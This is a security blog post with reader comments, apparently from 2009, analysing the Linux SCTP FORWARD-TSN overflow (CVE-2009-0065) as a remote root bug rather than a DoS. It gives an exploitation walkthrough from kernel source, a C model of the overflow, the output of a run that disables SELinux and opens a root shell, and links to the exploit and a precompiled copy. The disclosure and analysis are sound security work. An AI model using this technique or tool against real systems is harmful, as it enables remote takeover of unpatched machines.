When a "potential D.o.S." means a one-shot remote kernel exploit: the SCTP story
Common Vulnerabilities and Exposures
http://cve.mitre.org/cgi-bi/cvename.cgi?name=CVE-2009-0065
"Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID."
Ubuntu Security Notice USN-751-1
http://www.ubuntu.com/usn/usn-751-1
"The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)"
RedHat Security Advisory
http://rhn.redhat.com/errata/RHSA-2009-0331.html
"A buffer overflow was found in the Linux kernel Partial Reliable Stream Control Transmission Protocol (PR-SCTP) implementation. This could, potentially, lead to a denial of service if a Forward-TSN chunk is received with a large stream ID. (CVE-2009-0065, Important)"
Potentially a DoS? Unknown impact? Really? :D
I'm wondering why kernel developers (or vendors?) continue to claim that kernel memory corruptions are just Denial of Service. Most of the time they _are_ exploitable: yes, even when the vulnerability is remotely triggered; yes, even when the corruption takes place in a slub object in the middle of the kernel _heap_; yes, even when kernel data pages are marked NX and the kernel .text is read-only; and yes, absolutely yes, even when all you start with is a 16-bit displacement...
Last month one of my customers (who has a _custom_ SCTP application deployed on his network) asked me whether the vulnerability could have any impact on his systems. The answer? "Yes, it does." And since some people think it is not exploitable, and others speculate only about a local privilege escalation (with a remote host sending the FWD-TSN chunk), I decided to write a completely remote exploit.
It is extremely reliable (nearly always one-shot), provided that you know the target kernel. I tested it on Ubuntu 8.04 and Ubuntu 8.10 server boxes running different kernels (the Ubuntu amd64 kernels), on OpenSuse 11.1 and on a Fedora Core 10 (yes, extra brownie points here: it works great with SELinux too). ...
I don't want to talk about the exploit itself, because the code should be self-explanatory, but I'd like to briefly explore the vulnerability.
From an exploit writer's point of view, the most critical points are: where the memory corruption occurs, when it occurs, and what type of data structures are involved. The code that triggers the overflow is sctp_ssn_skip() in include/net/sctp/structs.h:
static inline void sctp_ssn_skip(struct sctp_stream *stream, __u16 id, __u16 ssn)
{
	stream->ssn[id] = ssn+1;
}
The "id" parameter is never checked and is later used as an index into the array referenced by the stream->ssn pointer. Since "id" is a 16-bit value and every entry is a 16-bit SSN, we can only overwrite memory _close_ to the struct involved (at most 128 KB past the start of the array), but we can write anywhere inside that window.
Let's take a look at the sctp_stream structure and its ssn pointer.
The sctp_ssnmap_new() and sctp_ssnmap_init() functions are in net/sctp/ssnmap.c. The structures involved in stream mapping are:
struct sctp_stream {
__u16 *ssn;
unsigned int len;
};
struct sctp_ssnmap {
struct sctp_stream in;
struct sctp_stream out;
int malloced;
};
The code that allocates them is the following:
#define MAX_KMALLOC_SIZE 131072 //0x20000
...
size = sctp_ssnmap_size(in, out);
if (size <= MAX_KMALLOC_SIZE) retval = kmalloc(size, gfp);
If size is under the MAX_KMALLOC_SIZE threshold, the function allocates the sctp_ssnmap struct with kmalloc(), and size is computed from the number of inbound and outbound streams.
That's good news! By manipulating the stream counts negotiated in the SCTP handshake we can arbitrarily choose the slab cache that will be used for the allocation, as long as the application does not impose its own limit on, for example, the number of simultaneously open SCTP streams.
Immediately after that, the function calls sctp_ssnmap_init() to initialize the in/out stream pointers:
static struct sctp_ssnmap *sctp_ssnmap_init(struct sctp_ssnmap *map, __u16 in, __u16 out)
{
memset(map, 0x00, sctp_ssnmap_size(in, out));
/* Start 'in' stream just after the map header. */
map->in.ssn = (__u16 *)&map[1]; <--- stream in init
map->in.len = in;
/* Start 'out' stream just after 'in'. */
map->out.ssn = &map->in.ssn[in]; <--- stream out init
map->out.len = out;
return map;
}
Again, good news. The stream pointers are self-contained: they point inside the buffer that was just allocated, and the inbound stream array starts right after the header. No kfree() will ever be called on these pointers; in other words they are a safe target to overwrite, and there is no need to worry about post-exploitation recovery.
The last thing that may complicate the exploit a bit is a check the kernel makes before invoking sctp_ssn_skip(), in sctp_ulpq_skip() (net/sctp/ulpqueue.c):
if (SSN_lt(ssn, sctp_ssn_peek(in, sid))) <--- check
return;
/* Mark that we are no longer expecting this SSN or lower. */
sctp_ssn_skip(in, sid, ssn);
with SSN_lt() defined as:
enum {
	SSN_SIGN_BIT = (1<<15)
};

static inline int SSN_lt(__u16 a, __u16 b)
{
	return ((a - b) & SSN_SIGN_BIT);
}
Strictly speaking, this code checks whether the value we are about to overwrite (the SSN currently stored for that stream id) is greater than the new value: if it is, the FWD-TSN chunk is not processed for that stream. The comparison uses serial number arithmetic (the same kind used for protocol sequence numbers, e.g. TCP sequence numbers), so it can be fooled by sending multiple chunks that step the stored value forward until it legitimately wraps around to a chosen, well-defined value.
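To make the three points above concrete, here is an added example that is not part of the original post and not code from the kernel tree: a user-space model of the sctp_ssnmap layout quoted above. It packs two maps back to back, the way two objects of the same slab cache sit next to each other, and shows that an unchecked 16-bit stream id in sctp_ssn_skip() lands on the first bytes of the neighbouring map (its in.ssn pointer), that a bounds check against the negotiated stream count stops it, and how the SSN_lt() serial-number comparison wraps. The hardened ssn_skip_checked() is my illustration of the needed check, not the kernel's exact patch; the neighbour-object stride is an assumption that mirrors slab object rounding, and the corruption is detected by reading the first two bytes of the neighbour with memcpy so the result does not depend on endianness.

```c
/*
 * Added example: user-space model of the pre-2.6.28 SCTP ssnmap overflow.
 * Not the kernel's code; layout copied from the structures quoted above.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef uint16_t __u16;

/* Layout as quoted from the 2.6.2x kernel. */
struct sctp_stream {
	__u16 *ssn;
	unsigned int len;
};

struct sctp_ssnmap {
	struct sctp_stream in;
	struct sctp_stream out;
	int malloced;
};

enum { SSN_SIGN_BIT = (1 << 15) };

/* Serial-number "less than": true when a precedes b modulo 2^16. */
static inline int SSN_lt(__u16 a, __u16 b)
{
	return (a - b) & SSN_SIGN_BIT;
}

static size_t ssnmap_size(__u16 in, __u16 out)
{
	return sizeof(struct sctp_ssnmap) + (size_t)(in + out) * sizeof(__u16);
}

/* Mirrors sctp_ssnmap_init(): both ssn arrays live inside the same allocation. */
static struct sctp_ssnmap *ssnmap_init(struct sctp_ssnmap *map, __u16 in, __u16 out)
{
	memset(map, 0, ssnmap_size(in, out));
	map->in.ssn = (__u16 *)&map[1];
	map->in.len = in;
	map->out.ssn = &map->in.ssn[in];
	map->out.len = out;
	return map;
}

/* Vulnerable behaviour: id is never compared against the stream count. */
static void ssn_skip_unchecked(struct sctp_stream *s, __u16 id, __u16 ssn)
{
	s->ssn[id] = ssn + 1;
}

/* Hardened variant (illustration, not the kernel's patch): reject ids
 * outside the negotiated stream count. Returns 0 if the skip was applied. */
static int ssn_skip_checked(struct sctp_stream *s, __u16 id, __u16 ssn)
{
	if (id >= s->len)
		return -1;
	s->ssn[id] = ssn + 1;
	return 0;
}

/*
 * Two maps packed back to back (stride rounded to 8, as a slab would round
 * the object size; an assumption of this model). Skip a stream id on map A
 * that lands on the first two bytes of map B, i.e. on B's in.ssn pointer.
 * Returns 1 if the checked skip refuses and leaves B intact while the
 * unchecked skip clobbers it, 0 otherwise.
 */
static int demo_neighbour_corruption(__u16 in, __u16 out)
{
	size_t stride = (ssnmap_size(in, out) + 7) & ~(size_t)7;
	unsigned char *buf = calloc(2, stride);
	if (!buf)
		return 0;

	struct sctp_ssnmap *a = ssnmap_init((struct sctp_ssnmap *)buf, in, out);
	struct sctp_ssnmap *b = ssnmap_init((struct sctp_ssnmap *)(buf + stride), in, out);

	/* Index in a->in.ssn[] whose slot is the first __u16 of B's header. */
	__u16 evil_id = (__u16)((stride - sizeof(struct sctp_ssnmap)) / sizeof(__u16));
	__u16 before, after;
	memcpy(&before, (unsigned char *)b, sizeof(before));

	int rejected = ssn_skip_checked(&a->in, evil_id, 0x4140) == -1;
	memcpy(&after, (unsigned char *)b, sizeof(after));
	int untouched = after == before;

	ssn_skip_unchecked(&a->in, evil_id, 0x4140);	/* writes 0x4141 into B */
	memcpy(&after, (unsigned char *)b, sizeof(after));
	int clobbered = after == 0x4141;

	free(buf);
	return rejected && untouched && clobbered;
}

int main(void)
{
	printf("neighbour corruption reproduced: %s\n",
	       demo_neighbour_corruption(10, 10) ? "yes" : "no");
	printf("SSN_lt(0xffff, 1) = %d (after the wrap, 1 counts as newer)\n", SSN_lt(0xffff, 1));
	printf("SSN_lt(1, 0xffff) = %d\n", SSN_lt(1, 0xffff));
	return 0;
}
```

The evil_id value is simply the number of __u16 slots between the start of A's inbound array and the start of B, which is why the real bug only reaches objects within 128 KB of the map and why choosing the slab cache (by negotiating the stream counts) matters: it decides what kind of object sits at that distance. The wrap-around shown by SSN_lt(0xffff, 1) is the property the post exploits to pass the "old SSN" check with repeated chunks.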
So, at this point, if we know the target kernel, we can:
1) Control the slab/slub cache to be used
2) Overwrite a safe pointer close to the overflowing buffer
3) Easily control the overwritten data..
.. in other words..
..
#./sctp_houdini -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0
GAME OVER
The exploit code can be downloaded here.
86 Comments:
great!
Excellent work! Please continue your work!
kick ass!
oh snapparoonie! great work!
Great Job!
sgrakkyu++
Man, $100k if sold on the black market =)
Great job!
It's always nice to have good and talented people show us how we forget the obvious, continually. This somehow brings memories of Ciscogate to mind, but just by similarity of the original DoS vulnerability story.
Thanks for your work and for keeping full disclosure alive and well (where responsible). Everyone should be patched by now, unless they don't believe DoS vulns to be "important enough".
please compile sctp_houdini.c
gcc sctp_houdini.c -o sctp_houdini>> error:(
This is great stuff. The Linux kernel devs are making a joke of Linux security. We need more PoCs like this to make the case.
w00t it ..
Good work
This is not a "valid" exploitation of the bug.
system("iptables -t filter -A OUTPUT -p sctp --chunk-types any ABORT -j DROP");
Using system to invoke an external process that requires root permissions as a foundation for the example of the exploit invalidates the exploit. Remove the dependency on iptables (or any root permission application).
When the OS is Unix and the exploit coder is Sgrakkyu the exploitability rate deserves its own metrics.
As Microsoft does, vulnerabilities could still be exploitable if the attacker has tremendous skills.
Kudos
(Clarification on comment regarding the system call). This fails on a remote system running 2.6.25 unless iptables has been modified.
you rock !!
[quote]This is not a "valid" exploitation of the bug.[/quote]
It's a remote root exploit, not a privilege escalation!
Wonder if Backtrack4 is affected or not.
mmmmmmm maybe yes cos it's built on Ubuntu :-/
Shit!! you fucked H00lishit!!
JaJa
gcc sctp_houdini.c -o sctp
sctp_houdini.c:32:26: error: netinet/sctp.h: No such file or directory
sctp_houdini.c: In function 'make_sctp_connection':
sctp_houdini.c:710: error: storage size of 'msg' isn't known
sctp_houdini.c:712: error: invalid application of 'sizeof' to incomplete type 'struct sctp_initmsg'
sctp_houdini.c:730: error: 'SOL_SCTP' undeclared (first use in this function)
sctp_houdini.c:730: error: (Each undeclared identifier is reported only once
sctp_houdini.c:730: error: for each function it appears in.)
sctp_houdini.c:730: error: 'SCTP_INITMSG' undeclared (first use in this function)
apt-get install libsctp-dev
Slackware 12.2 // gcc 4.2.4 //
libsctp-dev fail
Excellent exploit.
It still requires the victim to have an application listening on a sctp socket, that is a little hard to find, so I suppose the sky is not falling for linux yet.
Debian 5 ...
apt-get install libsctp-dev ...
binutils (2.18.1~cvs20080103-7) ...
libgomp1 (4.3.2-1.1) ...
gcc-4.3 (4.3.2-1.1) ...
gcc (4:4.3.2-2) ...
linux-libc-dev (2.6.26-15) ...
libc6-dev (2.7-18) ...
libsctp1 (1.0.9.dfsg-1) ...
libsctp-dev (1.0.9.dfsg-1) ...
lksctp-tools (1.0.9.dfsg-1) ...
Compilation:OK Execution:OK
=D
I like the cut of your jib.
gcc -o tes sctp_houdini.c
sctp_houdini.c:32:26: error: netinet/sctp.h: No such file or directory
sctp_houdini.c: In function 'make_sctp_connection':
sctp_houdini.c:710: error: storage size of 'msg' isn't known
sctp_houdini.c:712: error: invalid application of 'sizeof' to incomplete type 'struct sctp_initmsg'
sctp_houdini.c:730: error: 'SOL_SCTP' undeclared (first use in this function)
sctp_houdini.c:730: error: (Each undeclared identifier is reported only once
sctp_houdini.c:730: error: for each function it appears in.)
sctp_houdini.c:730: error: 'SCTP_INITMSG' undeclared (first use in this function)
asdf.cpp:21:1: warning: "_GNU_SOURCE" redefined
/command-line/: warning: this is the location of the previous definition
asdf.cpp: In function ‘void* make_fwd_packet(uint16_t, uint16_t, uint32_t, uint32_t, uint16_t (*)[2], int, int*)’:
asdf.cpp:576: error: invalid conversion from ‘void*’ to ‘uint8_t*’
what about this? any hints?
ok, nevermind :P *stupid* :)
First of all, thanks for your comments/feedback.
I want to make some remarks:
- the exploit works _ONLY_ if you have a listening SCTP socket bound to an external interface and SCTP-PR enabled (if you don't have any SCTP application and you want to test the exploit, use the sctp_test program)
- don't try to run it (for testing purposes) on localhost; almost all the time it will fail for two main reasons:
1) the ABORT chunk may reach the SCTP stack
2) the ssnmap structures allocated by the client process play havoc with the ones allocated by the server, creating holes in the "neighbour overflow" exploit logic
- about other distributions and other architectures: all non-patched kernels are vulnerable... but _this_ exploit works only for x86-64 kernels (it does not work on 32-bit ones). Anyway, it's not difficult to port it, just do it if you want.
- about compilation issues: stop reporting them please :)
just install the libsctp-dev package and don't use the .cpp extension
Kernels in general always have flaws. Finding them on any driver or module is always something that kernel developers are trying to do. In fact there are toolkits out there that look for these, not only in SCTP, but also in TCP, UDP, IP et al.
When I worked for a large router company we turned these against some of the stacks we worked on and they of course found bugs. Since these tools cost $$'s it's not surprising the kernel developers for Linux SCTP did not have access to them. I know when we ran the tools against the FreeBSD SCTP stack a huge number of vulnerabilities were fixed.
Basically, bottom line is... I bet you could find bugs in several places in Linux (or other OSes) by using such tools.
you can get the remote compiled from here
http://sec-r1z.com/attachment.php?attachmentid=125&d=1240955667
you need to register, sorry, I am just a user there ..
Good work buddy keep going ..
/j0rd4n14n.r1z
Congratulations sgrakkyu, for me it had been years since tricks like this were seen,
really excellent.
Really nice, Sgrà!
Sgrakkyone, nice one, great work! You rock, man ;-) (gg sullivan)
"I'm wondering why kernel developers (or vendors?)..."
I assume Linus' stance on "security fixes" is why we don't see any coming from kernel.org:
http://article.gmane.org/gmane.linux.kernel/706600
look at all the script kiddies come out of the woodwork and not know how to fix/compile the code... as for the guy who said the exploit was "invalidated", come on man... it's a remote root exploit... run it as root on your own box (or one of your hacked boxen)
also MAJOR KUDOS sgrakkyu
go die script kiddies
good one :)
well done! thx for showing this
please continue your work
This is Art of hacking , cool ......
Few linux with sctp services, but very good job :)
very nice post
What is the SCTP port to scan IPs? And how can I discover the -t (version) of the server (IP)?
lol@ kiddies
a very nice piece of work man. just wish i had more use for it, as sctp based applications are of limited extent.
@ Gadi Evron - shut the fuck up, you know nothing about talent.
@sgrakkyu - I like how you discovered this!
Anyone get one ip vuln? :(